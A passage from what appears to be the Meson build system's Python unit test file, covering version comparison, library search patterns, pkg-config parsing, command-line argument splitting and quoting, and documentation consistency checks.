configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False) configfilename = configfile.name config.write(configfile) configfile.flush() configfile.close() opts = get_fake_options() opts.cross_file = (configfilename,) env = get_fake_env(opts=opts) detected_value = env.need_exe_wrapper() os.unlink(configfilename) desired_value = not detected_value config['properties'] = { 'needs_exe_wrapper': 'true' if desired_value else 'false' } configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False) configfilename = configfile.name config.write(configfile) configfile.close() opts = get_fake_options() opts.cross_file = (configfilename,) env = get_fake_env(opts=opts) forced_value = env.need_exe_wrapper() os.unlink(configfilename) self.assertEqual(forced_value, desired_value) def test_listify(self): listify = mesonbuild.mesonlib.listify # Test sanity self.assertEqual([1], listify(1)) self.assertEqual([], listify([])) self.assertEqual([1], listify([1])) # Test flattening self.assertEqual([1, 2, 3], listify([1, [2, 3]])) self.assertEqual([1, 2, 3], listify([1, [2, [3]]])) self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False)) # Test flattening and unholdering holder1 = ObjectHolder(1) self.assertEqual([holder1], listify(holder1)) self.assertEqual([holder1], listify([holder1])) self.assertEqual([holder1, 2], listify([holder1, 2])) self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]])) def test_unholder(self): unholder = mesonbuild.mesonlib.unholder holder1 = ObjectHolder(1) holder3 = ObjectHolder(3) holders = [holder1, holder3] self.assertEqual(1, unholder(holder1)) self.assertEqual([1], unholder([holder1])) self.assertEqual([1, 3], unholder(holders)) def test_extract_as_list(self): extract = mesonbuild.mesonlib.extract_as_list # Test sanity kwargs = {'sources': [1, 2, 3]} self.assertEqual([1, 2, 3], extract(kwargs, 'sources')) self.assertEqual(kwargs, {'sources': [1, 2, 3]}) self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True)) self.assertEqual(kwargs, {}) # Test unholding holder3 = ObjectHolder(3) kwargs = {'sources': [1, 2, holder3]} self.assertEqual(kwargs, {'sources': [1, 2, holder3]}) # flatten nested lists kwargs = {'sources': [1, [2, [3]]]} self.assertEqual([1, 2, 3], extract(kwargs, 'sources')) def test_pkgconfig_module(self): dummystate = mock.Mock() dummystate.subproject = 'dummy' _mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency) _mock.pcdep = mock.Mock() _mock.pcdep.name = "some_name" _mock.version_reqs = [] _mock = mock.Mock(held_object=_mock) # pkgconfig dependency as lib deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib") deps.add_pub_libs([_mock]) self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name") # pkgconfig dependency as requires deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib") deps.add_pub_reqs([_mock]) self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name") def _test_all_naming(self, cc, env, patterns, platform): shr = patterns[platform]['shared'] stc = patterns[platform]['static'] shrstc = shr + tuple([x for x in stc if x not in shr]) stcshr = stc + tuple([x for x in shr if x not in stc]) p = cc.get_library_naming(env, LibType.SHARED) self.assertEqual(p, shr) p = cc.get_library_naming(env, LibType.STATIC) self.assertEqual(p, stc) p = cc.get_library_naming(env, LibType.PREFER_STATIC) self.assertEqual(p, stcshr) p = cc.get_library_naming(env, LibType.PREFER_SHARED) self.assertEqual(p, shrstc) # Test find library by mocking up openbsd if platform != 
'openbsd': return with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f: f.write('') found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED) self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0') def test_find_library_patterns(self): ''' Unit test for the library search patterns used by find_library() ''' unix_static = ('lib{}.a', '{}.a') msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib') # This is the priority list of pattern matching for library searching patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'), 'static': unix_static}, 'linux': {'shared': ('lib{}.so', '{}.so'), 'static': unix_static}, 'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'), 'static': unix_static}, 'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll', 'lib{}.dll.a', '{}.dll', '{}.dll.a'), 'static': ('cyg{}.a',) + unix_static}, 'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'), 'static': msvc_static}, 'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll', '{}.dll.a', '{}.lib', '{}.dll'), 'static': msvc_static}} env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if is_osx(): self._test_all_naming(cc, env, patterns, 'darwin') elif is_cygwin(): self._test_all_naming(cc, env, patterns, 'cygwin') elif is_windows(): if cc.get_argument_syntax() == 'msvc': self._test_all_naming(cc, env, patterns, 'windows-msvc') else: self._test_all_naming(cc, env, patterns, 'windows-mingw') elif is_openbsd(): self._test_all_naming(cc, env, patterns, 'openbsd') else: self._test_all_naming(cc, env, patterns, 'linux') env.machines.host.system = 'openbsd' self._test_all_naming(cc, env, patterns, 'openbsd') env.machines.host.system = 'darwin' self._test_all_naming(cc, env, patterns, 'darwin') env.machines.host.system = 'cygwin' self._test_all_naming(cc, env, patterns, 'cygwin') env.machines.host.system = 'windows' self._test_all_naming(cc, env, patterns, 'windows-mingw') @skipIfNoPkgconfig def test_pkgconfig_parse_libs(self): ''' Unit test for parsing of pkg-config output to search for libraries https://github.com/mesonbuild/meson/issues/3951 ''' def create_static_lib(name): if not is_osx(): name.open('w').close() return src = name.with_suffix('.c') out = name.with_suffix('.o') with src.open('w') as f: f.write('int meson_foobar (void) { return 0; }') subprocess.check_call(['clang', '-c', str(src), '-o', str(out)]) subprocess.check_call(['ar', 'csr', str(name), str(out)]) with tempfile.TemporaryDirectory() as tmpdir: pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True) env = get_fake_env() compiler = env.detect_c_compiler(MachineChoice.HOST) env.coredata.compilers.host = {'c': compiler} env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions() p1 = Path(tmpdir) / '1' p2 = Path(tmpdir) / '2' p1.mkdir() p2.mkdir() # libfoo.a is in one prefix create_static_lib(p1 / 'libfoo.a') # libbar.a is in both prefixes create_static_lib(p1 / 'libbar.a') create_static_lib(p2 / 'libbar.a') # Ensure that we never statically link to these create_static_lib(p1 / 'libpthread.a') create_static_lib(p1 / 'libm.a') create_static_lib(p1 / 
'libc.a') create_static_lib(p1 / 'libdl.a') create_static_lib(p1 / 'librt.a') def fake_call_pkgbin(self, args, env=None): if '--libs' not in args: return 0, '', '' if args[-1] == 'foo': return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), '' if args[-1] == 'bar': return 0, '-L{} -lbar'.format(p2.as_posix()), '' if args[-1] == 'internal': return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), '' old_call = PkgConfigDependency._call_pkgbin old_check = PkgConfigDependency.check_pkgconfig PkgConfigDependency._call_pkgbin = fake_call_pkgbin PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin # Test begins try: kwargs = {'required': True, 'silent': True} foo_dep = PkgConfigDependency('foo', env, kwargs) self.assertEqual(foo_dep.get_link_args(), [(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()]) bar_dep = PkgConfigDependency('bar', env, kwargs) self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()]) internal_dep = PkgConfigDependency('internal', env, kwargs) if compiler.get_argument_syntax() == 'msvc': self.assertEqual(internal_dep.get_link_args(), []) else: link_args = internal_dep.get_link_args() for link_arg in link_args: for lib in ('pthread', 'm', 'c', 'dl', 'rt'): self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args) finally: # Test ends PkgConfigDependency._call_pkgbin = old_call PkgConfigDependency.check_pkgconfig = old_check # Reset dependency class to ensure that in-process configure doesn't mess up PkgConfigDependency.pkgbin_cache = {} PkgConfigDependency.class_pkgbin = PerMachine(None, None) def test_version_compare(self): comparefunc = mesonbuild.mesonlib.version_compare_many for (a, b, result) in [ ('0.99.beta19', '>= 0.99.beta14', True), ]: self.assertEqual(comparefunc(a, b)[0], result) for (a, b, op) in [ # examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison ("1.0010", "1.9", operator.gt), ("1.05", "1.5", operator.eq), ("1.0", "1", operator.gt), ("2.50", "2.5", operator.gt), ("fc4", "fc.4", operator.eq), ("FC5", "fc4", operator.lt), ("2a", "2.0", operator.lt), ("1.0", "1.fc4", operator.gt), ("3.0.0_fc", "3.0.0.fc", operator.eq), # from RPM tests ("1.0", "1.0", operator.eq), ("1.0", "2.0", operator.lt), ("2.0", "1.0", operator.gt), ("2.0.1", "2.0.1", operator.eq), ("2.0", "2.0.1", operator.lt), ("2.0.1", "2.0", operator.gt), ("2.0.1a", "2.0.1a", operator.eq), ("2.0.1a", "2.0.1", operator.gt), ("2.0.1", "2.0.1a", operator.lt), ("5.5p1", "5.5p1", operator.eq), ("5.5p1", "5.5p2", operator.lt), ("5.5p2", "5.5p1", operator.gt), ("5.5p10", "5.5p10", operator.eq), ("5.5p1", "5.5p10", operator.lt), ("5.5p10", "5.5p1", operator.gt), ("10xyz", "10.1xyz", operator.lt), ("10.1xyz", "10xyz", operator.gt), ("xyz10", "xyz10", operator.eq), ("xyz10", "xyz10.1", operator.lt), ("xyz10.1", "xyz10", operator.gt), ("xyz.4", "xyz.4", operator.eq), ("xyz.4", "8", operator.lt), ("8", "xyz.4", operator.gt), ("xyz.4", "2", operator.lt), ("2", "xyz.4", operator.gt), ("5.5p2", "5.6p1", operator.lt), ("5.6p1", "5.5p2", operator.gt), ("5.6p1", "6.5p1", operator.lt), ("6.5p1", "5.6p1", operator.gt), ("6.0.rc1", "6.0", operator.gt), ("6.0", "6.0.rc1", operator.lt), ("10b2", "10a1", operator.gt), ("10a2", "10b2", operator.lt), ("1.0aa", "1.0aa", operator.eq), ("1.0a", "1.0aa", operator.lt), ("1.0aa", "1.0a", operator.gt), ("10.0001", "10.0001", operator.eq), ("10.0001", "10.1", operator.eq), ("10.1", "10.0001", operator.eq), ("10.0001", "10.0039", operator.lt), ("10.0039", "10.0001", operator.gt), ("4.999.9", 
"5.0", operator.lt), ("5.0", "4.999.9", operator.gt), ("20101121", "20101121", operator.eq), ("20101121", "20101122", operator.lt), ("20101122", "20101121", operator.gt), ("2_0", "2_0", operator.eq), ("2.0", "2_0", operator.eq), ("2_0", "2.0", operator.eq), ("a", "a", operator.eq), ("a+", "a+", operator.eq), ("a+", "a_", operator.eq), ("a_", "a+", operator.eq), ("+a", "+a", operator.eq), ("+a", "_a", operator.eq), ("_a", "+a", operator.eq), ("+_", "+_", operator.eq), ("_+", "+_", operator.eq), ("_+", "_+", operator.eq), ("+", "_", operator.eq), ("_", "+", operator.eq), # other tests ('0.99.beta19', '0.99.beta14', operator.gt), ("1.0.0", "2.0.0", operator.lt), (".0.0", "2.0.0", operator.lt), ("alpha", "beta", operator.lt), ("1.0", "1.0.0", operator.lt), ("2.456", "2.1000", operator.lt), ("2.1000", "3.111", operator.lt), ("2.001", "2.1", operator.eq), ("2.34", "2.34", operator.eq), ("6.1.2", "6.3.8", operator.lt), ("1.7.3.0", "2.0.0", operator.lt), ("2.24.51", "2.25", operator.lt), ("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt), ("3.4.1", "3.4b1", operator.gt), ("041206", "200090325", operator.lt), ("0.6.2+git20130413", "0.6.2", operator.gt), ("2.6.0+bzr6602", "2.6.0", operator.gt), ("2.6.0", "2.6b2", operator.gt), ("2.6.0+bzr6602", "2.6b2x", operator.gt), ("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt), ("15.8b", "15.8.0.1", operator.lt), ("1.2rc1", "1.2.0", operator.lt), ]: ver_a = Version(a) ver_b = Version(b) if op is operator.eq: for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) if op is operator.lt: for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]: self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) if op is operator.gt: for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]: self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) def test_msvc_toolset_version(self): ''' Ensure that the toolset version returns the correct value for this MSVC ''' env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') toolset_ver = cc.get_toolset_version() self.assertIsNotNone(toolset_ver) # Visual Studio 2015 and older versions do not define VCToolsVersion # TODO: ICL doesn't set this in the VSC2015 profile either if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910: return if 'VCToolsVersion' in os.environ: vctools_ver = os.environ['VCToolsVersion'] else: self.assertIn('VCINSTALLDIR', os.environ) # See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/ vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text() self.assertTrue(vctools_ver.startswith(toolset_ver), msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver)) def test_split_args(self): split_args = mesonbuild.mesonlib.split_args join_args = mesonbuild.mesonlib.join_args if is_windows(): test_data = [ # examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments (r'"a b c" d e', 
['a b c', 'd', 'e'], True), (r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False), (r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False), (r'a\\\"b c d', [r'a\"b', 'c', 'd'], False), (r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False), # other basics (r'""', [''], True), (r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True), (r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True), (r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True), (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True), (r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True), ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False), # more illustrative tests (r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True), (r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True), (r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False), (r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True), (r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False), (r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True), (r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True), (r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True), (r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False), (r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False), (r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True), (r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False), (r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False), (r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True), ] else: test_data = [ (r"'a b c' d e", ['a b c', 'd', 'e'], True), (r"a/b/c d e", ['a/b/c', 'd', 'e'], True), (r"a\b\c d e", [r'abc', 'd', 'e'], False), (r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False), (r'"a b c" d e', ['a b c', 'd', 'e'], False), (r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False), (r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True), (r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True), (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False), (r"'a & b & c d e'", ['a & b & c d e'], True), (r"abd'e f'g h", [r'abde fg', 'h'], False), ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False), ('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False), ("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True), ('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False), ("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True), ] for (cmd, expected, roundtrip) in test_data: self.assertEqual(split_args(cmd), expected) if roundtrip: self.assertEqual(join_args(expected), cmd) def test_quote_arg(self): split_args = mesonbuild.mesonlib.split_args quote_arg = 
mesonbuild.mesonlib.quote_arg if is_windows(): test_data = [ ('', '""'), ('arg1', 'arg1'), ('/option1', '/option1'), ('/Ovalue', '/Ovalue'), ('/OBob&Alice', '/OBob&Alice'), ('/Ovalue with spaces', r'"/Ovalue with spaces"'), (r'/O"value with spaces"', r'"/O\"value with spaces\""'), (r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'), ('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'), ('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'), (r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'), ] else: test_data = [ ('arg1', 'arg1'), ('--option1', '--option1'), ('-O=value', '-O=value'), ('-O=Bob&Alice', "'-O=Bob&Alice'"), ('-O=value with spaces', "'-O=value with spaces'"), ('-O="value with spaces"', '\'-O=\"value with spaces\"\''), ('-O=/path with spaces/test', '\'-O=/path with spaces/test\''), ('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"), ] for (arg, expected) in test_data: self.assertEqual(quote_arg(arg), expected) self.assertEqual(split_args(expected)[0], arg) def test_depfile(self): for (f, target, expdeps) in [ # empty, unknown target ([''], 'unknown', set()), # simple target & deps (['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})), (['meson/foo.o: foo.c foo.h'], 'foo.c', set()), # get all deps (['meson/foo.o: foo.c foo.h', 'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})), (['meson/foo.o: foo.c foo.h', 'foo.c: gen.py'], 'foo.c', set({'gen.py'})), # linue continuation, multiple targets (['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})), (['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})), # \\ handling (['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})), # $ handling (['f$o.o: c/b'], 'f$o.o', set({'c/b'})), (['f$$o.o: c/b'], 'f$o.o', set({'c/b'})), # cycles (['a: b', 'b: a'], 'a', set({'a', 'b'})), (['a: b', 'b: a'], 'b', set({'a', 'b'})), ]: d = mesonbuild.depfile.DepFile(f) deps = d.get_all_dependencies(target) self.assertEqual(sorted(deps), sorted(expdeps)) def test_log_once(self): f = io.StringIO() with mock.patch('mesonbuild.mlog.log_file', f), \ mock.patch('mesonbuild.mlog._logged_once', set()): mesonbuild.mlog.log_once('foo') mesonbuild.mlog.log_once('foo') actual = f.getvalue().strip() self.assertEqual(actual, 'foo', actual) def test_log_once_ansi(self): f = io.StringIO() with mock.patch('mesonbuild.mlog.log_file', f), \ mock.patch('mesonbuild.mlog._logged_once', set()): mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo')) mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo')) actual = f.getvalue().strip() self.assertEqual(actual.count('foo'), 1, actual) mesonbuild.mlog.log_once('foo') actual = f.getvalue().strip() self.assertEqual(actual.count('foo'), 1, actual) f.truncate() mesonbuild.mlog.warning('bar', once=True) mesonbuild.mlog.warning('bar', once=True) actual = f.getvalue().strip() self.assertEqual(actual.count('bar'), 1, actual) def test_sort_libpaths(self): sort_libpaths = mesonbuild.dependencies.base.sort_libpaths self.assertEqual(sort_libpaths( ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'], ['/home/mesonuser/.local/lib/pkgconfig', 
'/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) def test_dependency_factory_order(self): b = mesonbuild.dependencies.base with tempfile.TemporaryDirectory() as tmpdir: with chdir(tmpdir): env = get_fake_env() env.scratch_dir = tmpdir f = b.DependencyFactory( 'test_dep', methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE] ) actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})] self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake']) f = b.DependencyFactory( 'test_dep', methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG] ) actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})] self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig']) def test_validate_json(self) -> None: """Validate the json schema for the test cases.""" try: from jsonschema import validate, ValidationError except ImportError: if is_ci(): raise raise unittest.SkipTest('Python jsonschema module not found.') with Path('data/test.schema.json').open() as f: schema = json.load(f) errors = [] # type: T.Tuple[str, Exception] for p in Path('test cases').glob('**/test.json'): with p.open() as f: try: validate(json.load(f), schema=schema) except ValidationError as e: errors.append((p.resolve(), e)) for f, e in errors: print('Failed to validate: "{}"'.format(f)) print(str(e)) self.assertFalse(errors) @unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release') class DataTests(unittest.TestCase): def test_snippets(self): hashcounter = re.compile('^ *(#)+') snippet_dir = Path('docs/markdown/snippets') self.assertTrue(snippet_dir.is_dir()) for f in snippet_dir.glob('*'): self.assertTrue(f.is_file()) if f.parts[-1].endswith('~'): continue if f.suffix == '.md': in_code_block = False with f.open() as snippet: for line in snippet: if line.startswith(' '): continue if line.startswith('```'): in_code_block = not in_code_block if in_code_block: continue m = re.match(hashcounter, line) if m: self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name) self.assertFalse(in_code_block, 'Unclosed code block.') else: if f.name != 'add_release_note_snippets_here': self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name) def test_compiler_options_documented(self): ''' Test that C and C++ compiler options and base options are documented in Builtin-Options.md. Only tests the default compiler for the current platform on the CI. 
''' md = None with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) env = get_fake_env() # FIXME: Support other compilers cc = env.detect_c_compiler(MachineChoice.HOST) cpp = env.detect_cpp_compiler(MachineChoice.HOST) for comp in (cc, cpp): for opt in comp.get_options().keys(): self.assertIn(opt, md) for opt in comp.base_options: self.assertIn(opt, md) self.assertNotIn('b_unknown', md) @staticmethod def _get_section_content(name, sections, md): for section in sections: if section and section.group(1) == name: try: next_section = next(sections) end = next_section.start() except StopIteration: end = len(md) # Extract the content for this section return md[section.end():end] raise RuntimeError('Could not find "{}" heading'.format(name)) def test_builtin_options_documented(self): ''' Test that universal options and base options are documented in Builtin-Options.md. ''' from itertools import tee md = None with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) found_entries = set() sections = re.finditer(r"^## (.+)$", md, re.MULTILINE) # Extract the content for this section content = self._get_section_content("Universal options", sections, md) subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE)) subcontent1 = self._get_section_content("Directories", subsections[0], content) subcontent2 = self._get_section_content("Core options", subsections[1], content) for subcontent in (subcontent1, subcontent2): # Find the option names options = set() # Match either a table row or a table heading separator: | ------ | rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE) # Skip the header of the first table next(rows) # Skip the heading separator of the first table next(rows) for m in rows: value = m.group(1) # End when the `buildtype` table starts if value is None: break options.add(value) self.assertEqual(len(found_entries & options), 0) found_entries |= options self.assertEqual(found_entries, set([ *mesonbuild.coredata.BUILTIN_OPTIONS.keys(), *mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE.keys() ])) # Check that `buildtype` table inside `Core options` matches how # setting of builtin options behaves # # Find all tables inside this subsection tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE) # Get the table we want using the header of the first column table = self._get_section_content('buildtype', tables, subcontent2) # Get table row data rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE) env = get_fake_env() for m in rows: buildtype, debug, opt = m.groups() if debug == 'true': debug = True elif debug == 'false': debug = False else: raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group())) env.coredata.set_builtin_option('buildtype', buildtype) self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype) self.assertEqual(env.coredata.builtins['optimization'].value, opt) self.assertEqual(env.coredata.builtins['debug'].value, debug) def test_cpu_families_documented(self): with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) sections = re.finditer(r"^## (.+)$", md, re.MULTILINE) content = self._get_section_content("CPU families", sections, md) # Find the list entries arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)] # Drop the header arches = set(arches[1:]) 
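        # The regex above picks up the first column of markdown table rows,
        # e.g. a row such as "| aarch64 | ... |" contributes 'aarch64', so
        # `arches` ends up holding the family names listed in Reference-tables.md.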
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families)) def test_markdown_files_in_sitemap(self): ''' Test that each markdown files in docs/markdown is referenced in sitemap.txt ''' with open("docs/sitemap.txt", encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE)) markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md'] exceptions = ['_Sidebar.md'] for f in markdownfiles: if f not in exceptions: self.assertIn(f, toc) def test_vim_syntax_highlighting(self): ''' Ensure that vim syntax highlighting files were updated for new functions in the global namespace in build files. ''' env = get_fake_env() interp = Interpreter(FakeBuild(env), mock=True) with open('data/syntax-highlighting/vim/syntax/meson.vim') as f: res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE) defined = set([a.strip() for a in res.group().split('\\')][1:]) self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys()))) def test_all_functions_defined_in_ast_interpreter(self): ''' Ensure that the all functions defined in the Interpreter are also defined in the AstInterpreter (and vice versa). ''' env = get_fake_env() interp = Interpreter(FakeBuild(env), mock=True) astint = AstInterpreter('.', '', '') 